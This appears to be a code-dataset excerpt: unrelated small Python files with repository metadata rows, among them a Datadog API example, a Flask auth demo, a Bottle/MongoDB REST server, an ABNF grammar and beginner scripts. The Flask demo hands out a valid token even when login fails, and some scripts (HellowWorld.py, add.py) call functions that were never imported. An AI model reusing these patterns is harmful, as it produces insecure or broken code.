return ops
if __name__ == "__main__":
print(find_inputs('puzzle_input.txt'))
| true
|
bfc0f3fd2bcc34c52edaff63b4fe0e49e20c9753
|
Python
|
DataDog/datadog-api-client-python
|
/examples/v2/users/GetInvitation.py
|
UTF-8
| 516
| 2.5625
| 3
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] |
permissive
|
"""
Get a user invitation returns "OK" response
"""
from os import environ
from datadog_api_client import ApiClient, Configuration
from datadog_api_client.v2.api.users_api import UsersApi
# the "user" has a "user_invitation"
USER_INVITATION_ID = environ["USER_INVITATION_ID"]
configuration = Configuration()
with ApiClient(configuration) as api_client:
api_instance = UsersApi(api_client)
response = api_instance.get_invitation(
user_invitation_uuid=USER_INVITATION_ID,
)
print(response)
| true
|
7294a89d0bb1bd9f243c7c9e36f4ac81beb8fb96
|
Python
|
code-verse/karate_demo
|
/simple_python_server_sample/app.py
|
UTF-8
| 842
| 2.671875
| 3
|
[] |
no_license
|
from flask import Flask, request, abort
from user import User
from authentication import Authentication
from uuid import uuid4
app = Flask(__name__)
tokens = []
@app.route('/')
def index():
return 'Server Up!'
@app.route('/user/<int:user_id>')
def show_user(user_id):
auth_token = request.headers.get('x-token')
print(auth_token)
print(tokens)
if auth_token not in tokens:
abort(401)
user_data = User(user_id, 'Mr. X', 'mr.x@email.com')
return user_data.to_json()
@app.route('/auth', methods=['POST'])
def auth():
data = request.get_json()
token = uuid4()
status = 'SUCCESS'
if data.get('username') != 'user_01':
status = 'FAILED'
auth_result = Authentication(token, status)
tokens.append(str(token))
return auth_result.to_json()
| true
|
7a74108d069a1f057784e02c9074591028cb3094
|
Python
|
JaideepBgit/MachinelearningModels
|
/supervised_learning_prediction.py
|
UTF-8
| 1,689
| 3.109375
| 3
|
[] |
no_license
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 14 13:17:47 2020
@author: Jaideep Bommidi
"""
"""
Idea on the accuracy of the model on validation set.
So first fit the model on the entire training dataset and make predictions on the validation dataset
"""
from pandas import read_csv
from pandas.plotting import scatter_matrix
from matplotlib import pyplot
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/iris.csv"
names = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class']
dataset = read_csv(url, names=names)
array = dataset.values
X = array[:,0:4]
y = array[:,4]
X_train, X_validation, Y_train, Y_validation = train_test_split(X,y, test_size=0.20,random_state=1)
model = SVC(gamma='auto')
model.fit(X_train, Y_train)
predictions = model.predict(X_validation)
"""
evaluate predictions
accuracy is 96.66% on the hold out dataset
confusion matrix - shows that three errors are made
"""
print(accuracy_score(Y_validation, predictions))
print(confusion_matrix(Y_validation, predictions))
print(classification_report(Y_validation, predictions))
| true
|
c8bb2bfdeca4891e24549679c50b76f549a9c7ce
|
Python
|
KristiKovacs/ForFun
|
/quiz.py
|
UTF-8
| 711
| 4
| 4
|
[] |
no_license
|
score = 0
def check_guess(guess, answer):
global score
still_guess = True
attempt = 0
while still_guess and attempt <3:
if guess.lower() == answer.lower():
print('Correct!')
score += 1
still_guess = False
else:
if attempt <2:
guess = input("Sorry, try again")
attempt += 1
if attempt == 3:
print("The correct answer is " + answer)
guess1 = input("Which bear lives in the North Pole?")
check_guess(guess1, 'Polar Bear')
guess2 = input("Which animal is faster: cat or cheetah?")
check_guess(guess2, 'cheetah')
print("your score is " + str(score))
| true
|
18c8f6a41fca4b04fe9f90f2cca92dd728b14c16
|
Python
|
am401/ip_verify
|
/ip-verify.py
|
UTF-8
| 752
| 3.640625
| 4
|
[] |
no_license
|
import ipaddress
import re
while True:
try:
ip = input("Enter an IP address: ")
if re.search('/', ip):
if ipaddress.ip_network(ip):
print("The IP is a CIDR IP. {}".format(ip))
continue
elif ipaddress.ip_address(ip).is_loopback:
print("The IP address is a loopback address: {}".format(ip))
continue
elif ipaddress.ip_address(ip).is_private:
print("The IP address is a private IP: {}".format(ip))
continue
elif ipaddress.ip_address(ip):
print("The IP address is valid: {}".format(ip))
continue
except ValueError:
print("ValueERROR. The IP address is invalid")
continue
| true
|
bc3ae7aacabd5ceb9a93df3bb94cdf65d4d37ea1
|
Python
|
Prosen-Ghosh/Problem-Solving
|
/Python/Codewars-Get Nth Event Number.py
|
UTF-8
| 209
| 2.59375
| 3
|
[] |
no_license
|
def nth_even(n):
return 2 * n - 2
# TUTORIAL: https://www.khanacademy.org/math/algebra/x2f8bb11595b61c86:sequences/x2f8bb11595b61c86:constructing-arithmetic-sequences/v/finding-the-100th-term-in-a-sequence
| true
|
7d4618d3753e262bd0c6814ee5417162990cc34f
|
Python
|
tzytammy/requests_unittest
|
/习题/求100内所有奇数的和(2500)/NO.1.py
|
UTF-8
| 60
| 3.234375
| 3
|
[] |
no_license
|
count =0
for i in range(1,100,2):
count+=i
print (count)
| true
|
bf405c7ef0fc4102386422d01a90ce491420a5b8
|
Python
|
scravy/abnf
|
/src/abnf/grammars/rfc5234.py
|
UTF-8
| 2,255
| 2.890625
| 3
|
[
"MIT"
] |
permissive
|
"""
This is the ABNF grammar, expressed in ABNF, plus the core rules.
Collected rules from RFC 5234
https://tools.ietf.org/html/rfc5234
"""
from ..parser import Rule as _Rule
from .misc import load_grammar_rules
@load_grammar_rules()
class Rule(_Rule):
"""Rule objects generated from ABNF in RFC 4647."""
grammar = [
"rulelist = 1*( rule / (*c-wsp c-nl) )",
"rule = rulename defined-as elements c-nl\
; continues if next line starts\
; with white space",
'rulename = ALPHA *(ALPHA / DIGIT / "-")',
'defined-as = *c-wsp ("=" / "=/") *c-wsp\
; basic rules definition and\
; incremental alternatives',
"elements = alternation *c-wsp",
"c-wsp = WSP / (c-nl WSP)",
"c-nl = comment / CRLF\
; comment or newline",
'comment = ";" *(WSP / VCHAR) CRLF',
'alternation = concatenation\
*(*c-wsp "/" *c-wsp concatenation)',
"concatenation = repetition *(1*c-wsp repetition)",
"repetition = [repeat] element",
'repeat = 1*DIGIT / (*DIGIT "*" *DIGIT)',
"element = rulename / group / option /\
char-val / num-val",
'group = "(" *c-wsp alternation *c-wsp ")"',
'option = "[" *c-wsp alternation *c-wsp "]"',
"char-val = DQUOTE *(%x20-21 / %x23-7E) DQUOTE\
; quoted string of SP and VCHAR\
; without DQUOTE",
'num-val = "%" (bin-val / dec-val / hex-val)',
'bin-val = "b" 1*BIT\
[ 1*("." 1*BIT) / ("-" 1*BIT) ]\
; series of concatenated bit values\
; or single ONEOF range',
'dec-val = "d" 1*DIGIT\
[ 1*("." 1*DIGIT) / ("-" 1*DIGIT) ]',
'hex-val = "x" 1*HEXDIG\
[ 1*("." 1*HEXDIG) / ("-" 1*HEXDIG) ]\
; white space',
]
| true
|
f770b337c4d242e45749ae34d09bee8dc014f440
|
Python
|
VOIDS-dev/Advanced-Learning-Lab
|
/correspondingproject/HellowWorld.py
|
UTF-8
| 1,592
| 2.75
| 3
|
[] |
no_license
|
import sys,getopt,random
from inputTools import userInput
from inputTools import sampleInput
from outputTools import outputResult
from learningTools import simpleLearning
if __name__ == '__main__':
opts,args = getopt.getopt(sys.argv[1:], "i:o:")
inputFile = ""
outputFile = ""
trainingFile = 'data/training'
for op,value in opts:
if op == "-i":
inputFile = value
if op == "-o":
outputFile = value
print(inputFile,outputFile,trainingFile)
users = userInput(inputFile)
samples = sampleInput(trainingFile)
print("Samples Done!")
classifier = simpleLearning(samples)
print("Classifier Done!")
for user in users:
user.age = classifier[0]
if user.age <= 24:
user.age_group = "xx-24"
if user.age > 24 and user.age < 34:
user.age_group = "25-34"
if user.age > 34 and user.age <= 49:
user.age_group = "35-49"
if user.age > 49:
user.age_group = "49-xx"
user.genderType = classifier[1]
if random(0,1) >= user.genderType:
user.gender = "female"
else:
user.gender = "male"
para = random(1,5)
user.open = classifier[2]*para/5
user.conscientious = classifier[3]*para/5
user.extrovert = classifier[4]*para/5
user.agreeable = classifier[5]*para/5
user.neurotic = classifier[6]*para/5
outputResult(user,outputFile)
pass
| true
|
2385ea78cd2dc41c5aba0b4ebed3c20fe0367f5f
|
Python
|
jerbridges/Artifact-3
|
/rest_server_final.py
|
UTF-8
| 2,551
| 2.6875
| 3
|
[] |
no_license
|
#!/usr/bin/python
# Jeremy Bridges
# CS 340
# 4/14/2020
# CS 499
# updated 6/2/2020
import json
from bson import json_util
import bottle
from bottle import request, route
import datetime
from pymongo import MongoClient
# connect to database and collection
connection = MongoClient('localhost', 27017)
db = connection['market']
collection = db['stocks']
# setup URI paths for create stock REST service
# uses json from POST to create a new document in stocks collection
@bottle.route('/stocks/api/v1.0/createStock/', method='POST')
def add_document():
data = request.forms.get('data')
stock = request.forms.get("ticker")
if not data:
bottle.abort(400, 'No Data Received')
entity = json.loads(data)
ticker = {"Ticker": stock}
entity.update(ticker)
print(entity)
try:
collection.insert_one(entity)
except:
bottle.abort(400, 'Unable to add document')
return json.loads(json.dumps(entity, indent=4, default=json_util.default))
# setup URI paths for get stock REST service
# queries one document by ticker symbol and returns json document
@bottle.route('/stocks/api/v1.0/getStock/', method='GET')
def get_document():
stock = bottle.request.query.ticker
cursor = collection.find_one({'Ticker': stock})
if not cursor:
bottle.abort(404, 'No stock found')
return json.loads(json.dumps(cursor, indent=4, default=json_util.default))
# setup URI paths for updating document REST service
# queries document by ticker symbol and updates parameters from curl PUT command
@bottle.route('/stocks/api/v1.0/updateStock/', method=['POST'])
def update_document():
ticker = request.forms.get('ticker')
field = request.forms.get('field')
# value = request.forms.get('value')
if not field:
bottle.abort(400, 'No Data Received')
entity = json.loads(field)
cursor = collection.update_one({'Ticker': ticker}, {"$set": entity})
if not cursor:
bottle.abort(404, 'No document found')
return "{0} is has been updated with {1}\n".format(ticker, entity)
# setup URI paths for delete REST service
# deletes document queried by ticker symbol
@bottle.route('/stocks/api/v1.0/deleteStock/', method=['POST'])
def delete_document():
ticker = request.forms.get('ticker')
cursor = collection.remove({'Ticker': ticker})
if not cursor:
bottle.abort(404, 'No document found')
return "{0} is now removed\n".format(ticker)
if __name__ == '__main__':
# app.run(debug=True)
bottle.run(reloader=True, host='localhost', port=8080)
| true
|
ebf044dafc0f23f639e15f5a3184136eecf6766a
|
Python
|
jozuah/simplon_devcloud_jeu_pendu_python
|
/Pendu/script.py
|
UTF-8
| 5,509
| 3.40625
| 3
|
[] |
no_license
|
#!/usr/bin/env python3
import logging
from logging.handlers import RotatingFileHandler
# création de l'objet logger qui va nous servir à écrire dans les logs
logger = logging.getLogger()
def main():
# on met le niveau du logger à DEBUG, comme ça il écrit tout
logger.setLevel(logging.DEBUG)
# création d'un formateur qui va ajouter le temps, le niveau
# de chaque message quand on écrira un message dans le log
formatter = logging.Formatter('%(asctime)s :: %(levelname)s :: %(message)s')
# création d'un handler qui va rediriger une écriture du log vers
# un fichier en mode 'append', avec 1 backup et une taille max de 1Mo
file_handler = RotatingFileHandler('log.txt', 'a', 1000000, 1)
# on lui met le niveau sur DEBUG, on lui dit qu'il doit utiliser le formateur
# créé précédement et on ajoute ce handler au logger
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
### Reset du fichier log
my_txt_file= open("log.txt", "r+")
# to erase all data
my_txt_file.truncate()
# to close file
my_txt_file.close()
logger.info("Start log")
from random_words import RandomWords
rw = RandomWords()
my_word = rw.random_word()
error_count=0
test_letter=0
word_complete=0
max_error=5
my_word_empty=[]
my_letter=0
HANGMANPICS = ['''
+---+
| |
|
|
|
|
=========''', '''
+---+
| |
O |
|
|
|
=========''', '''
+---+
| |
O |
| |
|
|
=========''', '''
+---+
| |
O |
/| |
|
|
=========''', '''
+---+
| |
O |
/|\ |
|
|
=========''', '''
+---+
| |
O |
/|\ |
/ \ |
|
=========''']
#Fonction qui teste si une lettre est contenue dans un mot
def test_letter_function(user_letter,game_word):
for i in game_word :
if i == user_letter:
logger.info("L'utilisateur a entré une lettre valide contenue dans le mot à trouver")
return 1
logger.info("L'utilisateur n'a pas entré une lettre contenue dans le mot à trouver")
return 0
#Fonction qui test si le mot a cherché est completement trouvé
def test_full_word (my_current_list):
for item in my_current_list:
if item == '_':
logger.info("Le mot n'a pas été trouvé totalement")
return 0
logger.info("Le mot a été trouvé totalement")
return 1
#Fonction qui s'assure que l'utilisateur a mis une lettre
def test_true_letter():
while True:
my_user_letter = input("\n\nEntrer une lettre:")
logger.info("l'input de l'user est:")
logger.info(my_user_letter)
if len(my_user_letter)==1 :
if my_user_letter.isalpha():
logger.info("L'utilisateur a entré une lettre")
return my_user_letter
else:
print("Il faut vraiment entrer une lettre ...")
logger.info("L'utilisateur n'a pas entré une lettre'")
#Initialisation d'une liste obtenue a partir du mot à chercher
my_word_as_list=list(my_word)
for i in range(len(my_word)):
my_word_empty.append('_')
#Affichage du mot vide et du pendu
print(HANGMANPICS[0])
for i in range(len(my_word)):
print("_ ", end='')
logger.info("le mot à trouver est:")
logger.info(my_word)
###LE JEU : BOUCLE QUI TOURNE TANT QUE L'UTILISATEUR N'A PAS FAIT 5 ERREURS
### OU SI LE MOT N'A PAS ÉTÉ COMPLÈTEMENT TROUVÉ
while (error_count < max_error) and (word_complete <1) :
my_letter = test_true_letter()
#Test pour savoir si la lettre de l'user est contenue dans le mot
test_letter= test_letter_function(my_letter,my_word)
#Si NON : on rajoute une erreur et on affiche le pendu
if(test_letter==0):
error_count = error_count + 1
print(my_letter, ": mauvais choix, %s/%s erreurs" %(error_count,max_error))
logger.info("Nombre d'erreurs actuel")
logger.info(error_count)
#Si OUI : on ajoute la lettre au mot vide
elif(test_letter==1):
for compteur in range (len(my_word)):
if my_letter == my_word_as_list[compteur]:
my_word_empty[compteur] = my_word_as_list[compteur]
logger.info(my_word_empty)
#Test si le mot est complet
word_complete = test_full_word(my_word_empty)
#Affichage du mot a chercher en tant que chaine de caracteres
my_word_empty_str=' '.join(map(str,my_word_empty))
print(HANGMANPICS[error_count])
print(my_word_empty_str)
if error_count>= max_error:
print("\nJeu perdu")
logger.info("Jeu perdu")
logger.info("nombre d'erreurs :")
logger.info(error_count)
print("\nLe mot à trouver était :", my_word)
elif word_complete == 1 :
print("\nJeu gagné")
logger.info("Jeu gagné")
logger.info("mot initial :")
logger.info(my_word)
logger.info("mot trouvé :")
logger.info(my_word_empty_str)
logger.info("End log")
| true
|
9529c0570678ab2e97484bda769a54213f907685
|
Python
|
lexsteens/MSD-challenge
|
/code/head.py
|
UTF-8
| 467
| 2.828125
| 3
|
[] |
no_license
|
import sys, getopt
def main(argv):
inputfile = ''
n = 10
try:
opts, args = getopt.getopt(argv, "hn:")
except getopt.GetoptError:
print 'head.py -n <lines> file'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'head.py -n <lines> file'
elif opt == '-n':
n = int(arg)
inputfile = args[0]
f_in = open(inputfile, 'r')
for i in range (0, n):
print(f_in.readline()),
f_in.close()
if __name__ == "__main__":
main(sys.argv[1:])
| true
|
a7f4d942c08fed6f70922ac080b5670a6a6734ba
|
Python
|
ramanuj760/Python1
|
/add.py
|
UTF-8
| 503
| 3.84375
| 4
|
[] |
no_license
|
a=int(input("enter the first number:"))
b=int(input("enter the second number:"))
c=a+b
print("the addition of two numbers is",c)
d=a-b
print("the subtraction of two numbers is",d)
e=a*b
print("the multiplication of two numbers is",e)
f=a/b
print("the division of two numbers is",f)
g=a**b
print("b is power of a",a)
a+=1
print("it show increment in a",a)
h=sqrt(a)
print("square root of a",h)
i=a//b
print("it is floor division it shows integer quotent ",i)
j=a%b
print("remainder if b divide a ",j)
| true
|